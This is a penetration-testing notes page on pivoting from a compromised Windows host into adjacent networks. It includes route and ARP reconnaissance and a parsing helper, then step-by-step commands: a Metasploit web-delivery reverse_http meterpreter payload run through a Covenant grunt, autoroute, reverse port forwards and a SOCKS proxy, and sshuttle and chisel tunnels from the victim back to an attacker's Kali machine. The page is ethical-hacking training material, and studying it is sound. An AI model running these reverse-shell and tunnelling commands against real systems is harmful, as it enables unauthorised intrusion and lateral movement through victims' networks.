- We need to see what other access our target machine has, starting with `route print`:

```
C:\Windows\system32>route print
===========================================================================
Interface List
 12...08 00 27 ae c1 68 ......Intel(R) PRO/1000 MT Desktop Adapter
  1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
         10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
        10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
       10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    331 ::1/128                  On-link
 12    281 fe80::/64                On-link
 12    281 fe80::857:534f:3bb0:8fce/128
                                    On-link
  1    331 ff00::/8                 On-link
 12    281 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None
```
- We can also look at the ARP cache with `arp -a`:

```
Interface: 10.0.2.15 --- 0xc
  Internet Address      Physical Address      Type
  10.0.2.3              08-00-27-35-94-d3     dynamic
  10.0.2.4              08-00-27-fc-72-e9     dynamic
  10.0.2.5              08-00-27-7f-90-90     dynamic
  10.0.2.8              08-00-27-1d-d2-98     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  192.168.57.1          52-54-00-12-35-00     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
```
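The two listings above are the raw material for the question "what other access does this machine have", and they are also exactly what an incident responder reads when judging how far a compromised host can reach. The following is an added triage helper, not code from the original notes: it parses `route print` and `arp -a` output into the attached subnets, the default gateway, and any learned ARP neighbours that sit outside every attached subnet (a hint of a further network). The sample text is a constructed, abridged copy of the listings above.

```python
import ipaddress
import re
# Constructed sample: the `route print` / `arp -a` rows shown on this page, abridged.
ROUTE_PRINT = """\
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
         10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
        10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
"""
ARP_A = """\
Interface: 10.0.2.15 --- 0xc
  Internet Address      Physical Address      Type
  10.0.2.3              08-00-27-35-94-d3     dynamic
  10.0.2.5              08-00-27-7f-90-90     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  192.168.57.1          52-54-00-12-35-00     dynamic
"""
ROUTE_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")  # dest mask gw iface metric
ARP_RE = re.compile(r"^\s*(\d+(?:\.\d+){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(dynamic|static)", re.I)

def parse_routes(text):
    """Yield (network, gateway, interface) for every IPv4 route row; header lines do not match."""
    for line in text.splitlines():
        m = ROUTE_RE.match(line)
        if m:
            dest, mask, gw, iface, _metric = m.groups()
            yield ipaddress.ip_network(f"{dest}/{mask}", strict=False), gw, iface

def attached_networks(text):
    """On-link subnets the host sits on; host (/32), loopback and multicast routes are noise."""
    return sorted({n for n, gw, _ in parse_routes(text)
                   if gw == "On-link" and n.prefixlen < 32
                   and not (n.is_loopback or n.is_multicast)})

def default_gateway(text):
    """Gateway of the 0.0.0.0/0 route, or None if the host has no default route."""
    return next((gw for n, gw, _ in parse_routes(text) if n.prefixlen == 0), None)

def arp_neighbours(text):
    """Dynamically learned ARP entries (IP -> MAC); static rows are broadcast/multicast."""
    return {m.group(1): m.group(2) for line in text.splitlines()
            if (m := ARP_RE.match(line)) and m.group(3).lower() == "dynamic"}

def off_subnet_neighbours(route_text, arp_text):
    """Learned neighbours outside every attached subnet: a sign of a further reachable network."""
    nets = attached_networks(route_text)
    return sorted(ip for ip in arp_neighbours(arp_text)
                  if not any(ipaddress.ip_address(ip) in n for n in nets))
```

On the page's own listings this reports a single attached subnet, 10.0.2.0/24, while the default gateway 192.168.57.1 answers ARP from outside it, which is why the host is worth looking at as a pivot point.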
- Now that we have other interesting IPs, we can try to reach those new ones.
- We can run a port scan on one of these IPs:

```
use auxiliary/scanner/portscan/tcp
set rhosts 10.0.2.5
set ports 445
run
```

```
[+] 10.0.2.5: - 10.0.2.5:445 - TCP OPEN
[*] 10.0.2.5: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

We could of course have set more ports, which makes this a handy nmap-like tool.
- We can assume that we have a shell with Covenant, for instance.
- We generate a payload with Metasploit through web delivery (more stealthy because it can pass as HTTP traffic); target 2 is the PowerShell target:

```
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_http
```

- Set lhost to your attacking machine.
- Set an lport.

```
exploit -j
```

- Now we can copy the payload and paste it into our grunt in Covenant.
- Metasploit should now have opened a session.
- We can choose an interface with `ipconfig` and add a route to its subnet with autoroute:

```
run autoroute -s 192.168.16.0/24
```

- We can check it has been added using:

```
run autoroute -p
```

- We can now set up a reverse port forward:

```
portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP
```

- We can check it has been added using:

```
portfwd
```

- We can background our session with CTRL-Z.
- We will set up a SOCKS proxy:

```
use auxiliary/server/socks4a
```

- We need to check our port in `/etc/proxychains4.conf` (9050 here):

```
set srvport 9050
```

- We can check our jobs using:

```
jobs
```

- We can kill the web delivery job that we do not need anymore:

```
jobs -k ID-OF-JOB
```

- We now need to create a listener in Covenant that will interact with the port forward set previously:

```
1 192.168.3.28:443 0.0.0.0:1234 Reverse
```

- BindAddress can stay at 0.0.0.0, BindPort should be 443, ConnectPort should be 1234 and ConnectAddress is the IP of our victim machine.
- We should now be able to reach the other machines in the network of the initial machine, which now has a route to our attacking machine, using proxychains.
Let's say you got a shell on a machine and this machine has local access to another one (let's call it machine 2). sshuttle will allow you to access machine 2 from your network and act as a proxy.

```
sshuttle --listen 0.0.0.0 -e "ssh -i keyfile" -r user@IP-OF-YOUR-TARGET-MACHINE IP-OF-SUBNET-ACCESSIBLE-THROUGH-MACHINE2/24 -v
# example
sshuttle --listen 0.0.0.0 -e "ssh -i key" -r root@10.10.120.117 172.12.1.0/24 -v
```
- If you have a shell on a machine that has a local port open, you can forward this port to your machine using chisel; this is called port forwarding. In our example we want to forward port 445 of the target machine, which is only open locally, so that we can then interact with it from our Kali on port 445:
- On my Kali: `chisel server --reverse` (it is going to listen on port 8080)
- On the target: `.\chisel.exe client KALI-IP:8080 R:445:127.0.0.1:445`
- You can check out examples of use of chisel in the Chatterbox writeup or the Windows buffer overflow one.
- To get a SOCKS proxy through chisel instead, from my Kali:

```
chisel server --reverse
```

- From the victim machine:

```
.\chisel.exe client IP-OF-KALI:8080 R:1080:socks
```

- In your `/etc/proxychains4.conf` add this line:

```
socks5 127.0.0.1 1080
```
{% embed url="https://orangecyberdefense.com/fr/insights/blog/ethical_hacking/etat-de-lart-du-pivoting-reseau-en-2019/" %}
Amazing resource about pivoting, but only in French; it can definitely be read using Google Translate.
{% endembed %}

{% embed url="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course" %}
TCM Security Academy - Practical Ethical Hacking - The Complete Course
{% endembed %}